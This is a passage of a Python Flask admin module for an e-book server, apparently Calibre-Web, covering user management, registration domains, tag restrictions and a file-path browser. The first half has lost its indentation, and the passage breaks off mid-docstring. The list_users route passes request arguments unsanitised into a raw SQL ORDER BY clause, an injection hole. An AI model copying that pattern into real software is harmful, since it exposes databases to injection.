allUser = ub.session.query(ub.User).all()
email_settings = config.get_mail_settings()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", allUser=allUser, email=email_settings, config=config, commit=commit,
feature_support=feature_support, kobo_support=kobo_support,
title=_(u"Admin page"), page="admin")
@admi.route("/admin/dbconfig", methods=["GET", "POST"])
@login_required
@admin_required
def db_configuration():
if request.method == "POST":
return _db_configuration_update_helper()
return _db_configuration_result()
@admi.route("/admin/config", methods=["GET"])
@login_required
@admin_required
def configuration():
return render_title_template("config_edit.html",
config=config,
provider=oauthblueprints,
feature_support=feature_support,
title=_(u"Basic Configuration"), page="config")
@admi.route("/admin/ajaxconfig", methods=["POST"])
@login_required
@admin_required
def ajax_config():
return _configuration_update_helper()
@admi.route("/admin/ajaxdbconfig", methods=["POST"])
@login_required
@admin_required
def ajax_db_config():
return _db_configuration_update_helper()
@admi.route("/admin/alive", methods=["GET"])
@login_required
@admin_required
def calibreweb_alive():
return "", 200
@admi.route("/admin/viewconfig")
@login_required
@admin_required
def view_configuration():
read_column = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
restrict_columns = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=read_column,
restrictColumns=restrict_columns,
languages=languages,
translations=translations,
title=_(u"UI Configuration"), page="uiconfig")
@admi.route("/admin/usertable")
@login_required
@admin_required
def edit_user_table():
visibility = current_user.view_settings.get('useredit', {})
languages = calibre_db.speaking_language()
translations = babel.list_translations() + [LC('en')]
allUser = ub.session.query(ub.User)
tags = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
custom_values = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
custom_values = []
if not config.config_anonbrowse:
allUser = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
users=allUser.all(),
tags=tags,
custom_values=custom_values,
translations=translations,
languages=languages,
visiblility=visibility,
all_roles=constants.ALL_ROLES,
kobo_support=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@admi.route("/ajax/listusers")
@login_required
@admin_required
def list_users():
off = int(request.args.get("offset") or 0)
limit = int(request.args.get("limit") or 10)
search = request.args.get("search")
sort = request.args.get("sort", "id")
order = request.args.get("order", "").lower()
state = None
if sort == "state":
state = json.loads(request.args.get("state", "[]"))
if sort != "state" and order:
order = text(sort + " " + order)
elif not state:
order = ub.User.id.asc()
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
total_count = filtered_count = all_user.count()
if search:
all_user = all_user.filter(or_(func.lower(ub.User.name).ilike("%" + search + "%"),
func.lower(ub.User.kindle_mail).ilike("%" + search + "%"),
func.lower(ub.User.email).ilike("%" + search + "%")))
if state:
users = calibre_db.get_checkbox_sorted(all_user.all(), state, off, limit, request.args.get("order", "").lower())
else:
users = all_user.order_by(order).offset(off).limit(limit).all()
if search:
filtered_count = len(users)
for user in users:
if user.default_language == "all":
user.default = _("All")
else:
user.default = LC.parse(user.default_language).get_language_name(get_locale())
table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": users}
js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
response = make_response(js_list)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/deleteuser", methods=['POST'])
@login_required
@admin_required
def delete_user():
user_ids = request.form.to_dict(flat=False)
users = None
if "userid[]" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id.in_(user_ids['userid[]'])).all()
elif "userid" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id == user_ids['userid'][0]).all()
count = 0
errors = list()
success = list()
if not users:
log.error("User not found")
return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
for user in users:
try:
message = _delete_user(user)
count += 1
except Exception as ex:
log.error(ex)
errors.append({'type': "danger", 'message': str(ex)})
if count == 1:
log.info("User {} deleted".format(user_ids))
success = [{'type': "success", 'message': message}]
elif count > 1:
log.info("Users {} deleted".format(user_ids))
success = [{'type': "success", 'message': _("{} users deleted successfully").format(count)}]
success.extend(errors)
return Response(json.dumps(success), mimetype='application/json')
@admi.route("/ajax/getlocale")
@login_required
@admin_required
def table_get_locale():
locale = babel.list_translations() + [LC('en')]
ret = list()
current_locale = get_locale()
for loc in locale:
ret.append({'value': str(loc), 'text': loc.get_language_name(current_locale)})
return json.dumps(ret)
@admi.route("/ajax/getdefaultlanguage")
@login_required
@admin_required
def table_get_default_lang():
languages = calibre_db.speaking_language()
ret = list()
ret.append({'value': 'all', 'text': _('Show All')})
for lang in languages:
ret.append({'value': lang.lang_code, 'text': lang.name})
return json.dumps(ret)
@admi.route("/ajax/editlistusers/<param>", methods=['POST'])
@login_required
@admin_required
def edit_list_user(param):
vals = request.form.to_dict(flat=False)
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
# only one user is posted
if "pk" in vals:
users = [all_user.filter(ub.User.id == vals['pk'][0]).one_or_none()]
else:
if "pk[]" in vals:
users = all_user.filter(ub.User.id.in_(vals['pk[]'])).all()
else:
return _("Malformed request"), 400
if 'field_index' in vals:
vals['field_index'] = vals['field_index'][0]
if 'value' in vals:
vals['value'] = vals['value'][0]
elif not ('value[]' in vals):
return _("Malformed request"), 400
for user in users:
try:
if param in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
if 'value[]' in vals:
setattr(user, param, prepare_tags(user, vals['action'][0], param, vals['value[]']))
else:
setattr(user, param, vals['value'].strip())
else:
vals['value'] = vals['value'].strip()
if param == 'name':
if user.name == "Guest":
raise Exception(_("Guest Name can't be changed"))
user.name = check_username(vals['value'])
elif param =='email':
user.email = check_email(vals['value'])
elif param =='kobo_only_shelves_sync':
user.kobo_only_shelves_sync = int(vals['value'] == 'true')
elif param == 'kindle_mail':
user.kindle_mail = valid_email(vals['value']) if vals['value'] else ""
elif param.endswith('role'):
value = int(vals['field_index'])
if user.name == "Guest" and value in \
[constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
raise Exception(_("Guest can't have this role"))
# check for valid value, last on checks for power of 2 value
if value > 0 and value <= constants.ROLE_VIEWER and (value & value-1 == 0 or value == 1):
if vals['value'] == 'true':
user.role |= value
elif vals['value'] == 'false':
if value == constants.ROLE_ADMIN:
if not ub.session.query(ub.User).\
filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != user.id).count():
return Response(
json.dumps([{'type': "danger",
'message':_(u"No admin user remaining, can't remove admin role",
nick=user.name)}]), mimetype='application/json')
user.role &= ~value
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid role"))
elif param.startswith('sidebar'):
value = int(vals['field_index'])
if user.name == "Guest" and value == constants.SIDEBAR_READ_AND_UNREAD:
raise Exception(_("Guest can't have this view"))
# check for valid value, last on checks for power of 2 value
if value > 0 and value <= constants.SIDEBAR_LIST and (value & value-1 == 0 or value == 1):
if vals['value'] == 'true':
user.sidebar_view |= value
elif vals['value'] == 'false':
user.sidebar_view &= ~value
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid view"))
elif param == 'locale':
if user.name == "Guest":
raise Exception(_("Guest's Locale is determined automatically and can't be set"))
if vals['value'] in _BABEL_TRANSLATIONS:
user.locale = vals['value']
else:
raise Exception(_("No Valid Locale Given"))
elif param == 'default_language':
languages = calibre_db.session.query(db.Languages) \
.join(db.books_languages_link) \
.join(db.Books) \
.filter(calibre_db.common_filters()) \
.group_by(text('books_languages_link.lang_code')).all()
lang_codes = [lang.lang_code for lang in languages] + ["all"]
if vals['value'] in lang_codes:
user.default_language = vals['value']
else:
raise Exception(_("No Valid Book Language Given"))
else:
return _("Parameter not found"), 400
except Exception as ex:
log.debug_or_exception(ex)
return str(ex), 400
ub.session_commit()
return ""
@admi.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@admin_required
def update_table_settings():
current_user.view_settings['useredit'] = json.loads(request.data)
try:
try:
flag_modified(current_user, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
log.error("Invalid request received: {}".format(request))
return "Invalid request", 400
return ""
def check_valid_read_column(column):
if column != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == column) \
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
def check_valid_restricted_column(column):
if column != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == column) \
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
@admi.route("/admin/viewconfig", methods=["POST"])
@login_required
@admin_required
def update_view_configuration():
to_save = request.form.to_dict()
_config_string(to_save, "config_calibre_web_title")
_config_string(to_save, "config_columns_to_ignore")
if _config_string(to_save, "config_title_regex"):
calibre_db.update_title_sort(config)
if not check_valid_read_column(to_save.get("config_read_column", "0")):
flash(_(u"Invalid Read Column"), category="error")
log.debug("Invalid Read column")
return view_configuration()
_config_int(to_save, "config_read_column")
if not check_valid_restricted_column(to_save.get("config_restricted_column", "0")):
flash(_(u"Invalid Restricted Column"), category="error")
log.debug("Invalid Restricted Column")
return view_configuration()
_config_int(to_save, "config_restricted_column")
_config_int(to_save, "config_theme")
_config_int(to_save, "config_random_books")
_config_int(to_save, "config_books_per_page")
_config_int(to_save, "config_authors_max")
_config_string(to_save, "config_default_language")
_config_string(to_save, "config_default_locale")
config.config_default_role = constants.selected_roles(to_save)
config.config_default_role &= ~constants.ROLE_ANONYMOUS
config.config_default_show = sum(int(k[5:]) for k in to_save if k.startswith('show_'))
if "Show_detail_random" in to_save:
config.config_default_show |= constants.DETAIL_RANDOM
config.save()
flash(_(u"Calibre-Web configuration updated"), category="success")
log.debug("Calibre-Web configuration updated")
before_request()
return view_configuration()
@admi.route("/ajax/loaddialogtexts/<element_id>", methods=['POST'])
@login_required
def load_dialogtexts(element_id):
    """Return the confirmation-dialog text for *element_id* as a JSON
    object with "header", "main" and "valid" keys."""
    messages = {
        "config_delete_kobo_token": 'Do you really want to delete the Kobo Token?',
        "btndeletedomain": 'Do you really want to delete this domain?',
        "btndeluser": 'Do you really want to delete this user?',
        "delete_shelf": 'Are you sure you want to delete this shelf?',
        "select_locale": 'Are you sure you want to change locales of selected user(s)?',
        "select_default_language": 'Are you sure you want to change visible book languages for selected user(s)?',
        "role": 'Are you sure you want to change the selected role for the selected user(s)?',
        "restrictions": 'Are you sure you want to change the selected restrictions for the selected user(s)?',
        "sidebar_view": 'Are you sure you want to change the selected visibility restrictions for the selected user(s)?',
        "kobo_only_shelves_sync": 'Are you sure you want to change shelf sync behavior for the selected user(s)?',
        "db_submit": 'Are you sure you want to change Calibre library location?',
        "btnfullsync": "Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?",
    }
    texts = {"header": "", "main": "", "valid": 1}
    if element_id in messages:
        # translate only the matched message, as the if/elif chain did
        texts["main"] = _(messages[element_id])
    return json.dumps(texts)
@admi.route("/ajax/editdomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def edit_domain(allow):
    """Rename a registration-domain entry (x-editable endpoint).

    Expects POST fields 'pk' (record id) and 'value' (new pattern);
    '*' and '?' wildcards are stored as SQL '%' / '_'.
    """
    # POST /post
    # name:  'username',  //name of field (column in db)
    # pk:    1            //primary key (record id)
    # value: 'superuser!' //new value
    vals = request.form.to_dict()
    answer = ub.session.query(ub.Registration).filter(ub.Registration.id == vals['pk']).first()
    if answer is None:
        # Unknown primary key: previously this raised AttributeError (HTTP 500)
        return ""
    answer.domain = vals['value'].replace('*', '%').replace('?', '_').lower()
    return ub.session_commit("Registering Domains edited {}".format(answer.domain))
@admi.route("/ajax/adddomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def add_domain(allow):
    """Add a registration-domain pattern for the given allow/deny list,
    unless an identical entry already exists."""
    pattern = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
    existing = (ub.session.query(ub.Registration)
                .filter(ub.Registration.domain == pattern)
                .filter(ub.Registration.allow == allow)
                .first())
    if existing is None:
        ub.session.add(ub.Registration(domain=pattern, allow=allow))
        ub.session_commit("Registering Domains added {}".format(pattern))
    return ""
@admi.route("/ajax/deletedomain", methods=['POST'])
@login_required
@admin_required
def delete_domain():
    """Delete a registration-domain entry; if the allow-list becomes empty,
    restore the catch-all default so registration stays possible."""
    form = request.form.to_dict()
    try:
        domain_id = form['domainid'].replace('*', '%').replace('?', '_').lower()
    except KeyError:
        # no 'domainid' posted — nothing to do
        return ""
    ub.session.query(ub.Registration).filter(ub.Registration.id == domain_id).delete()
    ub.session_commit("Registering Domains deleted {}".format(domain_id))
    # If last domain was deleted, add all domains by default
    if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
        ub.session.add(ub.Registration(domain="%.%", allow=1))
        ub.session_commit("Last Registering Domain deleted, added *.* as default")
    return ""
@admi.route("/ajax/domainlist/<int:allow>")
@login_required
@admin_required
def list_domain(allow):
    """Return all registration domains of the given allow/deny list as JSON,
    with SQL wildcards mapped back to '*' / '?' for display."""
    answer = ub.session.query(ub.Registration).filter(ub.Registration.allow == allow).all()
    # Serialize once. The former double-quote/single-quote round trip
    # (dumps -> swap quotes -> dumps -> strip -> swap back) produced the
    # same JSON for plain domains but corrupted any domain containing a
    # quote character.
    js = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in answer])
    response = make_response(js)
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@admi.route("/ajax/editrestriction/<int:res_type>", defaults={"user_id": 0}, methods=['POST'])
@admi.route("/ajax/editrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def edit_restriction(res_type, user_id):
    """Edit a single allow/deny restriction entry in place.

    Form fields: 'id' — 'a<idx>' (allow list) or 'd<idx>' (deny list),
    'Element' — the new value. res_type selects the target:
    0 = template tags, 1 = template custom-column values,
    2 = per-user tags, 3 = per-user custom-column values.
    """
    element = request.form.to_dict()
    if element['id'].startswith('a'):  # allow list: index follows the 'a' prefix
        if res_type == 0:  # Tags as template
            elementlist = config.list_allowed_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_allowed_tags = ','.join(elementlist)
            config.save()
        if res_type == 1:  # CustomC
            elementlist = config.list_allowed_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_allowed_column_value = ','.join(elementlist)
            config.save()
        if res_type == 2:  # Tags per user
            # user_id == 0 (default route) still resolves via the int branch;
            # non-int falls back to the logged-in user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_allowed_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.allowed_tags = ','.join(elementlist)
            ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.allowed_tags))
        if res_type == 3:  # CColumn per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_allowed_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.allowed_column_value = ','.join(elementlist)
            ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name, usr.allowed_column_value))
    if element['id'].startswith('d'):  # deny list: same structure as above
        if res_type == 0:  # Tags as template
            elementlist = config.list_denied_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_denied_tags = ','.join(elementlist)
            config.save()
        if res_type == 1:  # CustomC
            elementlist = config.list_denied_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_denied_column_value = ','.join(elementlist)
            config.save()
        if res_type == 2:  # Tags per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_denied_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.denied_tags = ','.join(elementlist)
            ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.denied_tags))
        if res_type == 3:  # CColumn per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_denied_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.denied_column_value = ','.join(elementlist)
            ub.session_commit("Changed denied columns of user {} to {}".format(usr.name, usr.denied_column_value))
    return ""
def restriction_addition(element, list_func):
    """Add element['add_element'] to the comma-separated list produced by
    *list_func* and return the new comma-joined string.

    A list of [''] (empty stored value) is treated as empty; duplicates
    are not appended.
    """
    elementlist = list_func()
    if elementlist == ['']:
        elementlist = []
    # idiomatic membership test ('x not in y') and append instead of '+= [x]'
    if element['add_element'] not in elementlist:
        elementlist.append(element['add_element'])
    return ','.join(elementlist)
def restriction_deletion(element, list_func):
    """Remove the first occurrence of element['Element'] from the list
    produced by *list_func* and return the remainder comma-joined."""
    entries = list_func()
    try:
        entries.remove(element['Element'])
    except ValueError:
        pass  # value absent — nothing to remove
    return ','.join(entries)
def prepare_tags(user, action, tags_name, id_list):
    """Build the new comma-separated restriction string for *user*.

    tags_name: name of the user attribute to update (contains "tags" for
    tag restrictions, otherwise a custom-column restriction attribute).
    action: "add" or "remove"; any other value raises.
    id_list: ids of db.Tags rows (or custom-column value rows) to apply.
    Returns the merged comma-joined value; raises Exception on unknown
    tag ids or invalid action.
    """
    if "tags" in tags_name:
        tags = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(id_list)).all()
        if not tags:
            raise Exception(_("Tag not found"))
        new_tags_list = [x.name for x in tags]
    else:
        # restricted custom column: look the values up in the column's mapped class
        tags = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
            .filter(db.cc_classes[config.config_restricted_column].id.in_(id_list)).all()
        new_tags_list = [x.value for x in tags]
    # empty stored string means no restrictions yet
    saved_tags_list = user.__dict__[tags_name].split(",") if len(user.__dict__[tags_name]) else []
    if action == "remove":
        saved_tags_list = [x for x in saved_tags_list if x not in new_tags_list]
    elif action == "add":
        saved_tags_list.extend(x for x in new_tags_list if x not in saved_tags_list)
    else:
        raise Exception(_("Invalid Action"))
    return ",".join(saved_tags_list)
@admi.route("/ajax/addrestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def add_user_0_restriction(res_type):
    """Route without a user id: add a restriction for user id 0 (template/current)."""
    return add_restriction(res_type, 0)
@admi.route("/ajax/addrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def add_restriction(res_type, user_id):
    """Add an allow/deny restriction entry.

    Form contains 'add_element' plus either 'submit_allow' or 'submit_deny'.
    res_type: 0 = template tags, 1 = template custom-column values,
    2 = per-user tags, 3 = per-user custom-column values.
    """
    element = request.form.to_dict()
    if res_type == 0:  # Tags as template
        if 'submit_allow' in element:
            config.config_allowed_tags = restriction_addition(element, config.list_allowed_tags)
            config.save()
        elif 'submit_deny' in element:
            config.config_denied_tags = restriction_addition(element, config.list_denied_tags)
            config.save()
    if res_type == 1:  # CCustom as template
        # Fix: the allowed value was previously built from list_denied_column_values
        # (and the denied value from list_allowed_column_values) — the two lists
        # were swapped, corrupting both on every addition.
        if 'submit_allow' in element:
            config.config_allowed_column_value = restriction_addition(element, config.list_allowed_column_values)
            config.save()
        elif 'submit_deny' in element:
            config.config_denied_column_value = restriction_addition(element, config.list_denied_column_values)
            config.save()
    if res_type == 2:  # Tags per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if 'submit_allow' in element:
            usr.allowed_tags = restriction_addition(element, usr.list_allowed_tags)
            ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.list_allowed_tags()))
        elif 'submit_deny' in element:
            usr.denied_tags = restriction_addition(element, usr.list_denied_tags)
            ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.list_denied_tags()))
    if res_type == 3:  # CustomC per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if 'submit_allow' in element:
            usr.allowed_column_value = restriction_addition(element, usr.list_allowed_column_values)
            ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name,
                                                                                usr.list_allowed_column_values()))
        elif 'submit_deny' in element:
            usr.denied_column_value = restriction_addition(element, usr.list_denied_column_values)
            ub.session_commit("Changed denied columns of user {} to {}".format(usr.name,
                                                                               usr.list_denied_column_values()))
    return ""
@admi.route("/ajax/deleterestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def delete_user_0_restriction(res_type):
    """Route without a user id: delete a restriction for user id 0 (template/current)."""
    return delete_restriction(res_type, 0)
@admi.route("/ajax/deleterestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def delete_restriction(res_type, user_id):
    """Delete one allow/deny restriction entry.

    Form field 'id' is 'a<idx>' (allow) or 'd<idx>' (deny); res_type
    selects template tags (0), template columns (1), per-user tags (2)
    or per-user columns (3).
    """
    element = request.form.to_dict()
    if res_type == 0:  # Tags as template
        if element['id'].startswith('a'):
            config.config_allowed_tags = restriction_deletion(element, config.list_allowed_tags)
            config.save()
        elif element['id'].startswith('d'):
            config.config_denied_tags = restriction_deletion(element, config.list_denied_tags)
            config.save()
    elif res_type == 1:  # CustomC as template
        if element['id'].startswith('a'):
            config.config_allowed_column_value = restriction_deletion(element, config.list_allowed_column_values)
            config.save()
        elif element['id'].startswith('d'):
            config.config_denied_column_value = restriction_deletion(element, config.list_denied_column_values)
            config.save()
    elif res_type == 2:  # Tags per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if element['id'].startswith('a'):
            usr.allowed_tags = restriction_deletion(element, usr.list_allowed_tags)
            # Fix: call the accessor — the log previously embedded a bound-method repr
            ub.session_commit("Deleted allowed tags of user {}: {}".format(usr.name, usr.list_allowed_tags()))
        elif element['id'].startswith('d'):
            usr.denied_tags = restriction_deletion(element, usr.list_denied_tags)
            # Fix: log the *denied* tags here (the allowed list was logged before)
            ub.session_commit("Deleted denied tags of user {}: {}".format(usr.name, usr.list_denied_tags()))
    elif res_type == 3:  # Columns per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if element['id'].startswith('a'):
            usr.allowed_column_value = restriction_deletion(element, usr.list_allowed_column_values)
            ub.session_commit("Deleted allowed columns of user {}: {}".format(usr.name,
                                                                              usr.list_allowed_column_values()))
        elif element['id'].startswith('d'):
            usr.denied_column_value = restriction_deletion(element, usr.list_denied_column_values)
            ub.session_commit("Deleted denied columns of user {}: {}".format(usr.name,
                                                                             usr.list_denied_column_values()))
    return ""
@admi.route("/ajax/listrestriction/<int:res_type>", defaults={"user_id": 0})
@admi.route("/ajax/listrestriction/<int:res_type>/<int:user_id>")
@login_required
@admin_required
def list_restriction(res_type, user_id):
    """Return the allow/deny restriction entries for *res_type* as JSON.

    Each entry has 'Element' (value), 'type' (localized Allow/Deny label)
    and 'id' ('a<idx>' / 'd<idx>', matching edit/delete endpoints).
    Empty strings in the stored lists are skipped.
    """
    if res_type == 0:  # Tags as template
        restrict = [{'Element': x, 'type':_('Deny'), 'id': 'd'+str(i) }
                    for i,x in enumerate(config.list_denied_tags()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(config.list_allowed_tags()) if x != '']
        json_dumps = restrict + allow
    elif res_type == 1:  # CustomC as template
        restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
                    for i, x in enumerate(config.list_denied_column_values()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(config.list_allowed_column_values()) if x != '']
        json_dumps = restrict + allow
    elif res_type == 2:  # Tags per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
        else:
            usr = current_user
        restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
                    for i, x in enumerate(usr.list_denied_tags()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(usr.list_allowed_tags()) if x != '']
        json_dumps = restrict + allow
    elif res_type == 3:  # CustomC per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
        else:
            usr = current_user
        restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
                    for i, x in enumerate(usr.list_denied_column_values()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(usr.list_allowed_column_values()) if x != '']
        json_dumps = restrict + allow
    else:
        # unknown res_type: respond with an empty payload
        json_dumps = ""
    js = json.dumps(json_dumps)
    response = make_response(js)
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@admi.route("/ajax/fullsync")
@login_required
def ajax_fullsync():
    """Drop the current user's Kobo sync bookkeeping so the next Kobo
    connection performs a full re-sync; returns a JSON status message."""
    count = ub.session.query(ub.KoboSyncedBooks).filter(current_user.id == ub.KoboSyncedBooks.user_id).delete()
    message = _("{} sync entries deleted").format(count)
    ub.session_commit(message)
    return Response(json.dumps([{"type": "success", "message": message}]), mimetype='application/json')
@admi.route("/ajax/pathchooser/")
@login_required
@admin_required
def ajax_pathchooser():
    """Admin-only AJAX wrapper around the server-side path browser."""
    return pathchooser()
def pathchooser():
    """Server-side file/folder browser for the admin path-picker dialog.

    Query args: 'path' (start location), 'folder' ("true" to list folders
    only), 'filter' (exact file name to match). Returns a JSON object with
    the listing, the current and parent directory, and whether the path
    is absolute. NOTE(review): paths are taken from the request as-is;
    access is gated by the admin-only caller, not by this function.
    """
    browse_for = "folder"
    folder_only = request.args.get('folder', False) == "true"
    file_filter = request.args.get('filter', "")
    path = os.path.normpath(request.args.get('path', ""))
    # If a file was passed in, remember it and browse its directory instead
    if os.path.isfile(path):
        oldfile = path
        path = os.path.dirname(path)
    else:
        oldfile = ""
    absolute = False
    if os.path.isdir(path):
        # if os.path.isabs(path):
        cwd = os.path.realpath(path)
        absolute = True
        # else:
        #     cwd = os.path.relpath(path)
    else:
        # fall back to the server's working directory for unknown paths
        cwd = os.getcwd()
    cwd = os.path.normpath(os.path.realpath(cwd))
    parentdir = os.path.dirname(cwd)
    if not absolute:
        if os.path.realpath(cwd) == os.path.realpath("/"):
            cwd = os.path.relpath(cwd)
        else:
            cwd = os.path.relpath(cwd) + os.path.sep
        parentdir = os.path.relpath(parentdir) + os.path.sep
    # at filesystem root there is no parent to offer
    if os.path.realpath(cwd) == os.path.realpath("/"):
        parentdir = ""
    try:
        folders = os.listdir(cwd)
    except Exception:
        # unreadable directory: present an empty listing instead of failing
        folders = []
    files = []
    for f in folders:
        try:
            data = {"name": f, "fullpath": os.path.join(cwd, f)}
            data["sort"] = data["fullpath"].lower()
        except Exception:
            continue
        if os.path.isfile(os.path.join(cwd, f)):
            if folder_only:
                continue
            if file_filter != "" and file_filter != f:
                continue
            data["type"] = "file"
            data["size"] = os.path.getsize(os.path.join(cwd, f))
            # Reduce the byte count to a human-readable unit. The int result
            # of >> 10 compared against 0.3 behaves like "> 0", i.e. shift
            # while at least 1 KiB remains.
            power = 0
            while (data["size"] >> 10) > 0.3:
                power += 1
                data["size"] >>= 10
            # NOTE(review): units tops out at "T"; sizes >= 1024 TiB would
            # index out of range — presumably acceptable here, verify.
            units = ("", "K", "M", "G", "T")
            data["size"] = str(data["size"]) + " " + units[power] + "Byte"
        else:
            data["type"] = "dir"
            data["size"] = ""
        files.append(data)
    # directories first (type), then case-insensitive by full path (sort)
    files = sorted(files, key=operator.itemgetter("type", "sort"))
    context = {
        "cwd": cwd,
        "files": files,
        "parentdir": parentdir,
        "type": browse_for,
        "oldfile": oldfile,
        "absolute": absolute,
    }
    return json.dumps(context)
def _config_int(to_save, x, func=int):
    """Store form field *x* from *to_save* into config, converted via *func*
    (default int); returns whatever config.set_from_dictionary reports."""
    return config.set_from_dictionary(to_save, x, func)
def _config_checkbox(to_save, x):
    """Store checkbox field *x* as a boolean (HTML posts "on" when checked);
    missing field defaults to False."""
    return config.set_from_dictionary(to_save, x, lambda y: y == "on", False)
def _config_checkbox_int(to_save, x):
    """Store checkbox field *x* as 1/0 instead of True/False;
    missing field defaults to 0."""
    return config.set_from_dictionary(to_save, x, lambda y: 1 if (y == "on") else 0, 0)
def _config_string(to_save, x):
    """Store string field *x*, stripped of surrounding whitespace;
    falsy values are stored unchanged."""
    return config.set_from_dictionary(to_save, x, lambda y: y.strip() if y else y)
def _configuration_gdrive_helper(to_save):
    """Apply the Google-Drive part of the posted configuration.

    Returns the gdrive error text (None when everything is fine).
    NOTE(review): on a missing/empty client_secrets.json this returns a
